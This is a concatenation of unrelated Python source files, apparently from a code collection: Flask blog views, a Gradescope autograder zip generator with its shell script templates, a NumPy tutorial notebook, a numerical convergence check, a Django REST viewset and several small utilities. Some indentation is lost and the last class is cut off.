                "passwd": "pwd"
            }
        else:
            return False, "【{}】环境的数据库【{}】配置不存在".format(env_name, database_name)

    def get_application_host(self, env_name, application_name):
        """
        Return the application_host_options entry (base URL) for
        environment ``env_name`` and application ``application_name``.
        """
        if True:  # placeholder branch -- replace with a real lookup
            return 'http://www.baidu.com'
        else:
            raise Exception("【{}】环境的应用【{}】域名不存在".format(env_name, application_name))
|
# f(x) = 2x + 1
def f1(x):
    """Evaluate f(x) = 2x + 1."""
    doubled = 2 * x
    return doubled + 1
# f(x) = x^2 + 2x + 1
def f2(x):
    """Evaluate f(x) = x^2 + 2x + 1."""
    quadratic = x ** 2
    linear = 2 * x
    return quadratic + linear + 1
print(f1(10))
print(f2(10)) |
# coding=utf-8
from flask import render_template, request, current_app, redirect, url_for, flash, jsonify
from flask_login import login_required, login_user, logout_user, current_user
from . import main
from .forms import PostForm, EditForm, CommentForm, LoginForm
from .. import db
from ..models import Category, Post, Label, Comment, User, LikePost
from ..decorators import dexter_required
@main.route('/', methods=['GET', 'POST'])
def index():
    """Home page: paginated post list plus the shared login form."""
    categories = Category.query.all()
    labels = Label.query.all()
    page = request.args.get('page', 1, type=int)
    pagination = Post.query.order_by(Post.timestamp.desc()).paginate(
        page, per_page=current_app.config['POSTS_PER_PAGE'], error_out=False)
    # Login form rendered in the page header.
    loginform = LoginForm()
    if loginform.validate_on_submit():
        user = User.query.filter_by(username=loginform.username.data).first()
        if user is not None and user.verify_password(loginform.password.data):
            login_user(user, loginform.remember_me.data)
            return redirect(url_for('main.index'))
        flash('用户不存在或者密码填写错误!')
    return render_template(
        'index.html',
        posts=pagination.items,
        pagination=pagination,
        loginform=loginform,
        categories=categories,
        labels=labels)
@main.route('/category/<tag>', methods=['GET', 'POST'])
def category(tag):
    """List one category's posts, newest first, with the shared login form.

    Fix: the route only allowed GET, yet it renders and validates a login
    form -- submitting that form returned 405. 'POST' is now accepted,
    matching the index and post views.

    :param tag: category tag from the URL (404 when unknown)
    """
    categories = Category.query.all()
    category = Category.query.filter_by(tag=tag).first_or_404()
    page = request.args.get('page', 1, type=int)
    pagination = category.posts.order_by(Post.timestamp.desc()).paginate(
        page, per_page=current_app.config['POSTS_PER_PAGE'], error_out=False)
    posts = pagination.items
    # Login form rendered in the page header.
    loginform = LoginForm()
    if loginform.validate_on_submit():
        user = User.query.filter_by(username=loginform.username.data).first()
        if user is not None and user.verify_password(loginform.password.data):
            login_user(user, loginform.remember_me.data)
            return redirect(url_for('main.category', tag=tag))
        flash('用户不存在或者密码填写错误!')
    return render_template('category.html', category=category, posts=posts, pagination=pagination, loginform=loginform
                           , categories=categories)
@main.route('/write', methods=['GET', 'POST'])
@login_required
@dexter_required
def write():
    """Create a new post, updating Category and Label post counters."""
    categories = Category.query.all()
    form = PostForm()
    loginform = LoginForm()
    if form.validate_on_submit():
        labels = []
        tag = form.category.data
        # Label names arrive as one comma-separated string.
        labels_article = form.labels.data.split(',')
        for l in labels_article:
            label = Label.query.filter_by(label=l).first()
            if label is None:
                # First use of this label: create it with a zero count.
                label = Label(label=l, count=0)
                db.session.add(label)
                db.session.commit()
            labels.append(label)
        post = Post(title=form.title.data,
                    summery=form.summery.data,
                    body=form.body.data,
                    category=Category.query.filter_by(tag=tag).first(),
                    labels=labels,
                    comment_num=0,
                    like_num=0)
        # Adding a post also increments the post count of its Category.
        post.category.count += 1
        db.session.add(post.category)
        db.session.commit()
        # Adding a post also increments the post count of each of its Labels.
        for label in labels:
            label.count += 1
            db.session.add(label)
            db.session.commit()
        db.session.add(post)
        db.session.commit()
        return redirect(url_for('main.post', id=post.id))
    return render_template("write.html", form=form, loginform=loginform, categories=categories)
@main.route('/edit/<int:id>', methods=['GET', 'POST'])
@login_required
@dexter_required
def edit(id):
    """Edit an existing post, keeping per-Label post counts consistent.

    :param id: primary key of the Post to edit (404 when missing)
    """
    categories = Category.query.all()
    post = Post.query.get_or_404(id)
    form = EditForm()
    loginform = LoginForm()
    if form.validate_on_submit():
        labels = []
        labels_article = form.labels.data.split(',')
        for l in labels_article:
            label = Label.query.filter_by(label=l).first()
            if label is None:
                label = Label(label=l, count=0)
                db.session.add(label)
                db.session.commit()
            # `label` is a Label instance at this point.
            labels.append(label)
        post.title = form.title.data
        post.summery = form.summery.data
        post.body = form.body.data
        # Before updating post.labels, diff the old and new label sets so
        # each Label's post count is only adjusted for actual changes --
        # otherwise one post could be counted twice on the same Label.
        # 1. Labels added by this edit.
        for label in labels:
            if label not in post.labels:
                label.count += 1
                db.session.add(label)
                db.session.commit()
        # 2. Labels removed by this edit (iterate the pre-edit set).
        for label in post.labels:
            if label not in labels:
                label.count -= 1
                db.session.add(label)
                db.session.commit()
        # Update the post's labels.
        post.labels = labels
        db.session.add(post)
        db.session.commit()
        return redirect(url_for('main.post', id=post.id))
    # Pre-populate the form with the existing post data.
    form.title.data = post.title
    form.summery.data = post.summery
    form.body.data = post.body
    # Fix: the original accumulated this string in a variable named `str`,
    # shadowing the builtin; same output (trailing comma included).
    form.labels.data = ''.join(label.label + ',' for label in post.labels)
    return render_template("edit.html", form=form, category=post.category.tag, loginform=loginform
                           , categories=categories)
@main.route('/delete/<int:id>', methods=['GET'])
@login_required
@dexter_required
def delete_article(id):
    """Delete a post plus its comments, fixing Category/Label counters."""
    post = Post.query.get_or_404(id)
    # Deleting a post also decrements the post count of its Category.
    post.category.count -= 1
    db.session.add(post.category)
    db.session.commit()
    # Deleting a post also decrements the post count of each of its Labels.
    for label in post.labels:
        label.count -= 1
        db.session.add(label)
        db.session.commit()
    # Deleting a post also deletes all of its Comments.
    for comment in post.comments:
        db.session.delete(comment)
        db.session.commit()
    db.session.delete(post)
    db.session.commit()
    return redirect(url_for('main.index'))
@main.route('/delete_comment/<int:id>', methods=['GET'])
@login_required
@dexter_required
def delete_comment(id):
    """Delete one comment and decrement its post's comment counter."""
    comment = Comment.query.get_or_404(id)
    # Remember the owning post's id for the redirect below.
    post_id = comment.post.id
    # Removing a comment also decrements the post's comment count.
    comment.post.comment_num -= 1
    db.session.add(comment.post)
    db.session.commit()
    db.session.delete(comment)
    db.session.commit()
    return redirect(url_for('main.post', id=post_id))
@main.route('/logout')
@login_required
def logout():
    """Log the current user out and return to the home page."""
    logout_user()
    return redirect(url_for('main.index'))
@main.route('/like_post')
@login_required
def like_post():
    """Record a like on a post by the current user; return the new count."""
    # post_id arrives as a query-string parameter.
    post_id = request.args.get('post_id', 0, type=int)
    post = Post.query.get_or_404(post_id)
    # Local renamed so it does not shadow this view function's name.
    new_like = LikePost(post=post, user=current_user)
    db.session.add(new_like)
    db.session.commit()
    post.like_num += 1
    db.session.add(post)
    db.session.commit()
    return jsonify(likes=post.like_num)
@main.route('/undo_like_post')
@login_required
def undo_like_post():
    """Remove the current user's like from a post; return the new count.

    Fix: the original passed the Query object itself (missing ``.first()``)
    to ``db.session.delete``, which raises. Fetch the actual LikePost row
    and only decrement the counter when a like really existed.
    """
    post_id = request.args.get('post_id', 0, type=int)
    post = Post.query.get_or_404(post_id)
    like = LikePost.query.filter_by(post=post, user=current_user).first()
    if like is not None:
        db.session.delete(like)
        db.session.commit()
        post.like_num -= 1
        db.session.add(post)
        db.session.commit()
    return jsonify(likes=post.like_num)
@main.route('/post/<int:id>', methods=['GET', 'POST'])
def post(id):
    """Show one post with paginated comments, comment form and login form."""
    categories = Category.query.all()
    form = CommentForm()
    loginform = LoginForm()
    post = Post.query.get_or_404(id)
    # Whether the current user has already liked this post.
    like = False
    # Only query likes when a user is logged in; otherwise it stays False.
    if current_user.is_authenticated:
        if LikePost.query.filter_by(post=post, user=current_user).first() is not None:
            like = True
    page = request.args.get('page', 1, type=int)
    pagination = post.comments.order_by(Comment.timestamp.desc()).paginate(
        page, per_page=current_app.config['COMMENTS_PER_POST'], error_out=False)
    comments = pagination.items
    if form.validate_on_submit():
        comment = Comment(comment=form.comment.data, post=post, user=current_user)
        # Adding a comment also increments the post's comment count.
        post.comment_num += 1
        db.session.add(post)
        db.session.commit()
        db.session.add(comment)
        db.session.commit()
        return redirect(url_for('main.post', id=id))
    # Login form rendered in the page header.
    if loginform.validate_on_submit():
        user = User.query.filter_by(username=loginform.username.data).first()
        if user is not None and user.verify_password(loginform.password.data):
            login_user(user, loginform.remember_me.data)
            return redirect(url_for('main.post', id=id))
        flash('用户不存在或者密码填写错误!')
    return render_template("post.html", post=post, form=form, comments=comments, pagination=pagination
                           , loginform=loginform, categories=categories, like=like)
from asyncio import sleep
from time import time
from typing import Callable, Optional
from mobilium_server.utils.exceptions import TimeoutException
async def wait_until_true(action: Callable[[], bool], timeout: int = 30, interval: int = 1,
                          timeout_message: Optional[str] = None):
    """Poll ``action`` every ``interval`` seconds until it returns True.

    Raises TimeoutException with ``timeout_message`` (or a default built
    from the action's name) once ``timeout`` seconds elapse without a
    truthy result.
    """
    deadline = time() + timeout
    while True:
        if time() >= deadline:
            break
        if action():
            return
        await sleep(interval)
    message = timeout_message
    if message is None:
        message = "Timeout for {} after {} seconds".format(action.__name__, timeout)
    raise TimeoutException(message)
|
# -*- coding: latin-1 -*-
"""
* Resolução do exercício 5 do capítulo 1.4 (Timothy Sauer. Numerical Analysis. Pearson, 2ª Edição)
*
* Executado como : newton_1.4-11.py
*
* Parâmetros usados para teste:
* python newton_1.4-11.py
*
"""
import sys
from pprint import pprint
from numpy import array, zeros, diag, diagflat, dot,linalg
def sassenfeld(A):
    """Check Sassenfeld's convergence criterion for the square matrix A.

    B[i] = (sum_{k<i} |A[i][k]|*B[k] + sum_{k>i} |A[i][k]|) / |A[i][i]|,
    where entries below the diagonal use already-updated coefficients and
    entries above still use the initial value 1.

    Returns True when no coefficient exceeds 1, False otherwise.
    NOTE(review): the strict criterion requires max B[i] < 1; the `> 1`
    test here lets B[i] == 1 pass -- confirm that boundary is intended.

    Fix: removed an unreachable `break` that followed `return False`.

    :param A: square matrix (list of lists or 2-D numpy array)
    """
    n = len(A)
    soma = 0
    B = [1] * len(A)
    for i in range(n):
        j = i
        # Sum over k < i (updated coefficients).
        if j != 0:
            k = j-1
            while k >= 0:
                soma = abs(A[i][k])*B[k] + soma
                k = k - 1
        # Sum over k > i (coefficients still at their initial value 1).
        if j != n-1:
            k = j+1
            while k < n:
                soma = abs(A[i][k])*B[k] + soma
                k = k+1
        B[i] = soma/float(abs(A[i][j]))
        if B[i] > 1:
            # Criterion violated: no need to inspect the remaining rows.
            return False
        soma = 0
    return True
def main (argv):
    # Example matrix from the exercise; sassenfeld decides convergence.
    # (Python 2 file: print statements and latin-1 strings kept as-is.)
    A = array([[10,-1,1],[1,-10,-1],[1,1,-5]])
    print "A:"
    pprint(A)
    bol = sassenfeld(A)
    if bol:
        print "\n A matriz A é convergente."
    else:
        print "\n A matriz A não é convergente."

if __name__ == '__main__':
    main(sys.argv[1:])
#!/usr/bin/env python
# coding: utf-8
# # NumPy
# NumPy is a useful package that can help store and wrangle homogeneous data. This means that the data are all of the same [data type](https://jakevdp.github.io/PythonDataScienceHandbook/02.01-understanding-data-types.html) such as all **floats** or all **integers**.
#
# We strongly recommend working through the ["NumPy Quickstart Tutorial"](https://numpy.org/doc/stable/user/quickstart.html) for a more comprehensive introduction to NumPy. Here, we'll introduce some useful tools using the *NumPy* package to analyze large datasets.
# Before we can use NumPy, we need to import the package. We can also nickname the modules when we import them. The convention is to import `numpy` as `np`.
# In[1]:
# Import packages
import numpy as np
# Use whos 'magic command' to see available modules
get_ipython().run_line_magic('whos', '')
# ## NumPy Arrays
# The basis of the NumPy package is the **array**. A NumPy array is similar to a list of lists or a grid of values. You can create a [NumPy array](https://numpy.org/doc/stable/reference/generated/numpy.array.html) from a list using `np.array()`, by reading in a file, or through functions built into the NumPy package such as such as `arange`, `linspace`, `empty`, which we will discuss later.
# In[2]:
# Create a random list
list1 = [2, 4, 6, 8, 10, 12]
# Store list as a numpy array
array1 = np.array(list1)
print(array1)
# What we have created is a one-dimensional array which is similar to a normal list. NumPy arrays however, can be multidimensional. If we input a list of lists into `np.array()`, the output would be a multidimensional array (i.e a grid/matrix).
# In[3]:
# Create a 2nd random list
list2 = [1, 3, 5, 7, 9, 11]
# Store list of lists as a NumPy array
array1 = np.array([list1, list2])
print(array1)
# ## Accessing attributes of NumPy arrays
# We can return the shape and size of an array either by looking at the attributes of the array, or by using the `np.shape()` and `np.size()` functions. The `shape` attribute returns a tuple with the number of rows and columns of an array. The `size` attribute returns the total number of values stored within an array.
# In[4]:
print('Array1 has a shape of:')
print(array1.shape)
print('\nArray1 has a size of:')
print(array1.size)
# Other attributes that might be of interest are `ndim` and `dtype` which respectively return the number of dimensions of the array and the data types stored in the array. You can see the full list of ndarray attributes in the <a href = "https://numpy.org/doc/stable/reference/arrays.ndarray.html#array-attributes"> NumPy ndarray documentation</a>.
# In[5]:
print('Array1 dimensions:')
print(array1.ndim)
print('\nArray1 contains values of data type:')
print(array1.dtype)
# ## Indexing & Slicing Arrays
# You can index NumPy arrays using `array_name[row,column]` to select a single value. If you omit the column, it will give you the entire row. You can also use `:` for either row or column and it will return all of those values. We will demonstrate by indexing into `array1`.
# In[6]:
# Select the number 6 from our array
print('The value stored in row 1, column 3 is:')
print(array1[0,2])
# Select the 2nd row from our array
print('The values stored in row 2 are:')
print(array1[1])
# You may want to look at a slice of columns or a slice of rows. You can do so using `array(start_index:stop_index)` for either row or columns to select your slice.
# In[7]:
# Print the first 3 columns of each row
print(array1[: ,0:3])
# You can also select multiple specific columns by passing a `list` as your `columns`. Let's try to index the first, third, and last columns in `array1`.
# In[8]:
# Choose your columns of interest
columns = [0, 2, -1]
print(array1[:, columns])
# We can also change values in an array similar to how we would change values in a list. The syntax we use is `array[row,column] = new_desired_value`.
# In[9]:
# Change the entire first row of array1 to 100
array1[0,:] = 100
print(array1)
# For further explanation of how to index Numpy arrays, please visit the <a href = "https://numpy.org/doc/stable/reference/arrays.indexing.html"> NumPy indexing documentation</a>.
# ## Subsetting
# We can also subset our original array to only include data that meets our criteria. We can think of this as *filtering* the array by applying a condition to our array. The syntax for this would be `new_array = original_array[condition]`.
# In[10]:
# Reassign our original array
array1 = np.array([list1, list2])
# Return values greater than 5 from our array
condition = (array1 > 5)
filtered_array = array1[condition]
print(filtered_array)
# ## Benefits of Using Arrays
# The list of lists format is not wrong per se, but it makes working with the data more difficult. For example, if you were trying to add the numbers of the two lists together, simply adding the lists would only append one list at the end of the other. However, if you add two NumPy arrays together, the values of both arrays will be summed.
# In[11]:
# Add two lists together
list3 = [10, 20, 30, 40]
list4 = [20, 40, 60, 80]
print(list3 + list4)
print('\n')
# Add two arrays together
array2 = np.array([10, 20, 30, 40])
array3 = np.array([20, 40, 60, 80])
print(array2 + array3)
# Alternatively, you can use the `sum()` method to add all values in an array together. You can also specify whether you want to sum the values across rows or columns in a grid/matrix. If you specify you want to sum values in rows or columns, the output will be an array of the sums.
# In[12]:
# Create a 2 by 3 array
array4 = np.array([[5, 10], [15, 20], [25, 30]])
print('array4:')
print(array4)
print('\n')
# Sum all values in array
print('Array sum')
print(array4.sum())
print('\n')
# Sum the values across columns
print('Column sums')
print(array4.sum(axis = 0))
print('\n')
# Sum the values across rows
print('Row sums')
print(array4.sum(axis = 1))
# For a full list of array methods, please visit the <a href = "https://numpy.org/doc/stable/reference/arrays.ndarray.html#array-methods"> NumPy array methods documentation</a>. You can also visit the <a href = ""> NumPy Reference</a> for more information on functions, modules, and objects in NumPy.
# ## NumPy also includes some very useful array generating functions:
#
# * `arange`: like `range`, but gives you a useful NumPy array (instead of an iterator), and can use more than just integers
# * `linspace` creates an array with given start and end points, and a desired number of points
# * `logspace` same as linspace, but in log.
# * `random` can create a random list (there are <a href="https://docs.scipy.org/doc/numpy-1.14.0/reference/routines.random.html">many different ways to use this</a>)
# * `concatenate` which can concatenate two arrays along an existing axis [<a href="https://docs.scipy.org/doc/numpy/reference/generated/numpy.concatenate.html">documentation</a>]
# * `hstack` and `vstack` which can horizontally or vertically stack arrays
#
# Whenever we call these, we need to use whatever name we imported `numpy` as (here, `np`). We will demonstrate some of these functions below. For a full list of functions used to create arrays, please visit the <a href = "https://numpy.org/doc/stable/reference/routines.array-creation.html"> NumPy array creation documentation</a>.
# In[13]:
# When using linspace, both end points are included
print(np.linspace(0,147,10))
# In[14]:
# First array is a list of 10 numbers that are evenly spaced,
# and range from exactly 1 to 100
first_array = np.linspace(1,100, 10)
# Second row is a list of 10 numbers that begin
# at 0 and are exactly 10 apart
second_array = np.arange(0,100,10)
print(first_array)
print(second_array)
# In[15]:
# Create an array that has two rows
# First row should be 'first_array'
# Second row should be 'second_array'
big_array = np.vstack([first_array, second_array])
print(big_array)
# Numpy also has built in methods to save and load arrays: `np.save()` and `np.load()`. Numpy files have a .npy extension. See full documentation <a href="https://docs.scipy.org/doc/numpy/reference/generated/numpy.save.html">here</a>.
# In[16]:
# Save method takes arguments 'filename' and then 'array':
np.save('big_array',big_array)
# In[17]:
my_new_matrix = np.load('big_array.npy')
print(my_new_matrix)
# ## Additional Resources
# See the [Python Data Science Handbook](https://jakevdp.github.io/PythonDataScienceHandbook/02.00-introduction-to-numpy.html) for a more in depth exploration of NumPy, and of course, <a href = "https://numpy.org/doc/stable/contents.html#numpy-docs-mainpage">the original documentation</a>.
# In[ ]:
|
"""
Utilities for gradescope autograding.
"""
import os
import json
from fractions import Fraction
from zipfile import ZipFile, ZIP_DEFLATED
from . import __version__ as ZUCCHINI_VERSION
from .constants import ASSIGNMENT_CONFIG_FILE, ASSIGNMENT_FILES_DIRECTORY
from .utils import ConfigDictMixin, ConfigDictNoMangleMixin, \
datetime_from_string, recursive_get_using_string
class GradescopeMetadata(object):
    """
    Parse the metadata as described in:
    https://gradescope-autograders.readthedocs.io/en/latest/submission_metadata/
    """
    # (attribute name, dotted lookup key, converter) triples applied in
    # __init__ against the raw metadata dict.
    _ATTRS = [
        ('student_name', 'users.0.name', str),
        ('submission_date', 'created_at', datetime_from_string),
        ('due_date', 'users.0.assignment.due_date', datetime_from_string),
        # The nested int(float(..)) deal is because int('100.0')
        # explodes
        ('total_points', 'assignment.outline.0.weight',
         lambda pts: int(float(pts))),
    ]

    def __init__(self, json_dict):
        # Pull each configured key out of the raw dict, convert it, and
        # store it under the matching attribute name.
        for attr_name, dotted_key, converter in self._ATTRS:
            raw_value = recursive_get_using_string(json_dict, dotted_key)
            setattr(self, attr_name, converter(raw_value))

    @classmethod
    def from_json_path(cls, json_path):
        """Build an instance from a metadata JSON file on disk."""
        with open(json_path, 'r', errors='ignore') as json_fp:
            return cls(json.load(json_fp))
class GradescopeAutograderTestOutput(ConfigDictNoMangleMixin, ConfigDictMixin):
    """
    Output of a single test in Gradescope JSON.
    """
    def __init__(self, name=None, score=None, max_score=None, output=None):
        # name: display name of the test entry
        # score / max_score: points earned / possible (stringified upstream)
        # output: free-form text shown to the student for this entry
        self.name = name
        self.score = score
        self.max_score = max_score
        self.output = output
class GradescopeAutograderOutput(ConfigDictNoMangleMixin, ConfigDictMixin):
"""
Hold Gradescope Autograder output as described in
https://gradescope-autograders.readthedocs.io/en/latest/specs/#output-format
"""
def __init__(self, score=None, tests=None, extra_data=None):
self.score = score
self.tests = [GradescopeAutograderTestOutput.from_config_dict(test)
for test in tests] if tests is not None else None
self.extra_data = extra_data
def to_config_dict(self, *args):
dict_ = super(GradescopeAutograderOutput, self).to_config_dict(*args)
if dict_.get('tests', None):
dict_['tests'] = [test.to_config_dict() for test in dict_['tests']]
return dict_
@staticmethod
def _two_decimals(grade, frac):
"""Convert a fraction to string with two decimal points"""
return '{:.02f}'.format(grade.to_float(frac))
@classmethod
def from_grade(cls, grade):
"""
Convert a grading_manager.Grade to Gradescope JSON.
"""
score = grade.score()
tests = []
# Store the component grades in the extra_data field
extra_data = {'component_grades': grade.serialized_component_grades()}
computed_grade = grade.computed_grade()
# Add penalties
for penalty in computed_grade.penalties:
if penalty.points_delta != 0:
# Hack: Display -37 as 0/37 and +37 as 37/37
fake_max_score = cls._two_decimals(
grade, abs(penalty.points_delta))
fake_score = cls._two_decimals(grade, Fraction(0)) \
if penalty.points_delta < 0 else fake_max_score
test = GradescopeAutograderTestOutput(
name=penalty.name,
score=fake_score,
max_score=fake_max_score)
tests.append(test)
# Add actual test results
for component in computed_grade.components:
if component.error:
test = GradescopeAutograderTestOutput(
name=component.name,
score=cls._two_decimals(grade, component.points_got),
max_score=cls._two_decimals(
grade, component.points_possible),
output='{}\n{}'.format(component.error,
component.error_verbose or ''))
tests.append(test)
else:
for part in component.parts:
if part.deductions:
deductions = 'Deductions: {}\n\n'.format(
', '.join(part.deductions))
else:
deductions = ''
test = GradescopeAutograderTestOutput(
name='{}: {}'.format(component.name, part.name),
score=cls._two_decimals(grade, part.points_got),
max_score=cls._two_decimals(
grade, part.points_possible),
output=deductions + part.log)
tests.append(test)
return cls(score=score, tests=tests, extra_data=extra_data)
def to_json_stream(self, fp):
    """Write this output, serialized as JSON, to the open file object *fp*."""
    fp.write(json.dumps(self.to_config_dict()))
# setup.sh run by Gradescope when building the autograder image: installs
# Python 3, any extra apt prerequisites, and zucchini itself. Formatted with
# {prereqs}, {pip_install_arg} and {extra_setup_commands}.
SETUP_SH = r'''#!/bin/bash
# THIS FILE WAS GENERATED BY ZUCCHINI
set -e
cd /autograder/source
# Prevent apt from prompting for input and hanging the build
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get install -y python3 python3-pip python3-wheel {prereqs}
pip3 install {pip_install_arg}
{extra_setup_commands}
'''

# run_autograder executed by Gradescope per submission: flattens the
# submission, grades it, and bridges the result into results.json.
# {grade_cmd_prefix} optionally wraps grading in run_graphical.sh.
RUN_AUTOGRADER = r'''#!/bin/bash
# THIS FILE WAS GENERATED BY ZUCCHINI
set -e
set -o pipefail
cd /autograder/source
zucc flatten /autograder/submission
{grade_cmd_prefix}zucc grade-submission /autograder/submission \
| zucc gradescope bridge /autograder/submission_metadata.json \
> /autograder/results/results.json
'''

# Wrapper script that starts a dummy Xorg server on display :69, runs its
# arguments with DISPLAY set, then tears the server down — used when the
# grader needs a (headless) GUI.
RUN_GRAPHICAL_SH = r'''#!/bin/bash
cat >xorg.conf <<'EOF'
# This xorg configuration file is meant to be used by xpra
# to start a dummy X11 server.
# For details, please see:
# https://xpra.org/Xdummy.html
Section "ServerFlags"
Option "DontVTSwitch" "true"
Option "AllowMouseOpenFail" "true"
Option "PciForceNone" "true"
Option "AutoEnableDevices" "false"
Option "AutoAddDevices" "false"
EndSection
Section "Device"
Identifier "dummy_videocard"
Driver "dummy"
Option "ConstantDPI" "true"
VideoRam 192000
EndSection
Section "Monitor"
Identifier "dummy_monitor"
HorizSync 5.0 - 1000.0
VertRefresh 5.0 - 200.0
Modeline "1024x768" 18.71 1024 1056 1120 1152 768 786 789 807
EndSection
Section "Screen"
Identifier "dummy_screen"
Device "dummy_videocard"
Monitor "dummy_monitor"
DefaultDepth 24
SubSection "Display"
Viewport 0 0
Depth 24
Modes "1024x768"
Virtual 1024 768
EndSubSection
EndSection
EOF
/usr/lib/xorg/Xorg -noreset -logfile ./xorg.log -config ./xorg.conf :69 \
>/dev/null 2>&1 &
xorg_pid=$!
export DISPLAY=:69
"$@"
exitcode=$?
kill "$xorg_pid" || {
printf 'did not kill Xorg!\n' >&2
exit 1
}
exit $exitcode'''
class GradescopeAutograderZip(object):
    """
    Generates a Gradescope autograder zip file from which Gradescope
    generates a Docker image for grading.
    """

    def __init__(self, path='.', prerequisites=None, extra_setup_commands=None,
                 needs_display=False, wheel_path=None):
        """
        :param path: directory holding the assignment config/grading files
        :param prerequisites: extra apt packages to install in the image
        :param extra_setup_commands: shell commands appended to setup.sh
        :param needs_display: if True, wrap grading in a dummy X server
        :param wheel_path: local zucchini wheel to install instead of the
                           PyPI release
        """
        self.path = path
        # Copy the caller-supplied lists so we never mutate the arguments
        self.prerequisites = list(prerequisites) if prerequisites else []
        self.extra_setup_commands = (list(extra_setup_commands)
                                     if extra_setup_commands else [])
        self.needs_display = needs_display
        self.wheel_path = wheel_path
        # Need the dummy X video driver for headless graphical grading.
        # (Bug fix: the original appended to the `prerequisites` argument,
        # which is None by default — AttributeError — and is owned by the
        # caller; append to our own copy instead.)
        if self.needs_display:
            self.prerequisites.append('xserver-xorg-video-dummy')

    def _relative_path(self, abspath):
        """
        Convert an absolute path to an assignment file to a path
        relative to self.path.
        """
        return os.path.relpath(abspath, self.path)

    def _real_path(self, relpath):
        """
        Convert a relative path to an assignment file to an absolute
        path.
        """
        return os.path.join(self.path, relpath)

    def _write_file(self, file_path, zipfile, real_path=None):
        """
        Add a file to the generated zip file. file_path is the
        destination path in the .zip file. If real_path is not provided,
        it will be self.path/file_path.
        """
        if real_path is None:
            real_path = self._real_path(file_path)
        zipfile.write(real_path, file_path)

    def _write_string(self, string, path, zipfile):
        """
        Add a file with the given string contents to the generated zip
        file. path is the destination path in the .zip file.
        """
        zipfile.writestr(path, string)

    def _write_dir(self, dir_path, zipfile):
        """
        Recursively add a directory to the generated zip file. dir_path
        should be relative to self.path.
        """
        real_path = self._real_path(dir_path)
        for dirpath, _, filenames in os.walk(real_path):
            for filename in filenames:
                relpath = self._relative_path(os.path.join(dirpath, filename))
                self._write_file(relpath, zipfile)

    def write_zip(self, file):
        """
        Write the autograder .zip to file. If file is a file-like
        object, write it there, otherwise it should be a string
        designating the destination path.
        """
        with ZipFile(file, 'w', ZIP_DEFLATED) as zipfile:
            self._write_file(ASSIGNMENT_CONFIG_FILE, zipfile)
            grading_files = self._real_path(ASSIGNMENT_FILES_DIRECTORY)
            if os.path.exists(grading_files):
                self._write_dir(ASSIGNMENT_FILES_DIRECTORY, zipfile)
            if self.needs_display:
                self._write_string(RUN_GRAPHICAL_SH, 'run_graphical.sh',
                                   zipfile)
                grade_cmd_prefix = 'bash run_graphical.sh '
            else:
                grade_cmd_prefix = ''
            run_autograder = RUN_AUTOGRADER.format(
                grade_cmd_prefix=grade_cmd_prefix)
            self._write_string(run_autograder, 'run_autograder', zipfile)
            if self.wheel_path is None:
                # Install the matching zucchini release from PyPI
                pip_install_arg = 'zucchini==' + ZUCCHINI_VERSION
            else:
                # Can't just name it `zucchini.whl' or something because
                # this upsets pip
                wheel_filename = os.path.basename(self.wheel_path)
                self._write_file(wheel_filename, zipfile,
                                 real_path=self.wheel_path)
                pip_install_arg = wheel_filename
            extra_setup_commands = '\n'.join(self.extra_setup_commands)
            setup_sh = SETUP_SH.format(
                pip_install_arg=pip_install_arg,
                prereqs=' '.join(self.prerequisites),
                extra_setup_commands=extra_setup_commands)
            self._write_string(setup_sh, 'setup.sh', zipfile)
|
from rdflib import Namespace, Graph, Literal, RDF, URIRef
from rdfalchemy.rdfSubject import rdfSubject
from rdfalchemy import rdfSingle, rdfMultiple, rdfList
from brick.brickschema.org.schema._1_0_2.Brick.Discharge_Air_Temperature_Cooling_Setpoint import Discharge_Air_Temperature_Cooling_Setpoint
from brick.brickschema.org.schema._1_0_2.Brick.Supply_Air_Temperature_Cooling_Setpoint import Supply_Air_Temperature_Cooling_Setpoint
from brick.brickschema.org.schema._1_0_2.Brick.Dead_Band_Setpoint import Dead_Band_Setpoint
class Cooling_Supply_Air_Temperature_Dead_Band_Setpoint(
        Discharge_Air_Temperature_Cooling_Setpoint,
        Supply_Air_Temperature_Cooling_Setpoint,
        Dead_Band_Setpoint):
    """Brick 1.0.2 ontology class; rdf_type ties instances to the Brick URI."""
    rdf_type = Namespace(
        'https://brickschema.org/schema/1.0.2/Brick#'
    ).Cooling_Supply_Air_Temperature_Dead_Band_Setpoint
|
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello, World!", 200
if __name__ == "__main__":
from os.path import dirname
from frameworks.common import run_gunicorn
run_gunicorn(
cwd=dirname(__file__),
app="hello:app",
worker="meinheld",
)
|
import json
from django.core.files import File
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import status, filters, viewsets
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
from rest_framework.decorators import action
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.settings import api_settings
# Importar los modelos
from api.models import Seccion
# Importar los serializer
from api.serializers import SeccionSerializer, SeccionRegistroSerializer
# Importar IsDirector
from api.permissions import IsDirector
#
from django.db.models import Count
""" VIEWSETS Seccion """
class SeccionViewSet(viewsets.ModelViewSet):
    """CRUD endpoints for active Seccion records, restricted to directors."""

    # Only expose records that have not been soft-deleted
    queryset = Seccion.objects.filter(activo=True)
    # Permission: only directors may access this viewset
    permission_classes = (IsDirector,)
    # Search, ordering and field-filter backends
    filter_backends = (DjangoFilterBackend, filters.SearchFilter,
                       filters.OrderingFilter)
    # Fields the backends above operate on
    filter_fields = ("nombre_seccion",)
    search_fields = ("nombre_seccion",)
    ordering_fields = ("nombre_seccion",)

    def get_serializer_class(self):
        """Read serializer for list/retrieve; registration serializer otherwise."""
        if self.action in ('list', 'retrieve'):
            return SeccionSerializer
        return SeccionRegistroSerializer

    @action(detail=False, methods=['get'])
    def totalSecciones(self, request):
        """Return {'total_seccion': <count of active Seccion rows>}."""
        try:
            queryset = Seccion.objects.filter(
                activo=True
            ).aggregate(
                total_seccion=Count('id')
            )
            return Response(queryset, status=status.HTTP_200_OK)
        except Exception as e:
            # Bug fix: the original passed the *set* {'detail', str(e)}
            # instead of a dict, which is not JSON-serializable.
            return Response({'detail': str(e)},
                            status=status.HTTP_400_BAD_REQUEST)
import numpy as np
import time
from lib.datetimehandler import DateUtility
from lib.pyqtgraph import *
from lib.ui.dateaxis import DateAxis
__author__ = 'aco-nav'
class DateAxis(AxisItem):
    """Axis item whose tick labels render epoch-second values as dates."""

    def tickStrings(self, values, scale, spacing):
        """Return one date string (via DateUtility.todate) per tick value."""
